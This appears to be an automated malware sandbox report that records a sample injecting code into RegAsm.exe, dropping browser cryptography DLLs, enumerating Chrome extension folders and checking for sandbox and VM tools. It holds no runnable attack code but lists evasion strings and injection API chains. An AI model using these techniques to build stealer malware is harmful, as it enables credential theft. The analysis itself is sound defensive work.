                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00417645
                  Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.3.drStatic PE information: section name: .didat
                  Source: sqlx[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7534 push ecx; ret 0_2_006E7547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004191D5 push ecx; ret 3_2_004191E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FB536 push ecx; ret 3_2_6C6FB549
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00417645
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 6.2 %
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 2576Thread sleep count: 88 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h3_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F81B2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006F81B2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,3_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,3_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,3_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,3_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FE81 GetSystemInfo,wsprintfA,3_2_0040FE81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: RegAsm.exe, 00000003.00000002.2040315374.0000000003465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-95543
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7B35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006E7B35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00417645
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2E07 mov eax, dword ptr fs:[00000030h]0_2_006F2E07
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F0040 mov ecx, dword ptr fs:[00000030h]0_2_006F0040
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2E4B mov eax, dword ptr fs:[00000030h]0_2_006F2E4B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB84A GetProcessHeap,0_2_006FB84A
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7810 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006E7810
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7B35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006E7B35
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7C91 SetUnhandledExceptionFilter,0_2_006E7C91
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EC606 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006EC606
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041937F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041E438 SetUnhandledExceptionFilter,3_2_0041E438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041A8A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C6FB66C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C6FB1F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C8AAC62

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02CD018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_02CD018D
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Searches for specific processes (likely to inject)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_004111BE
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
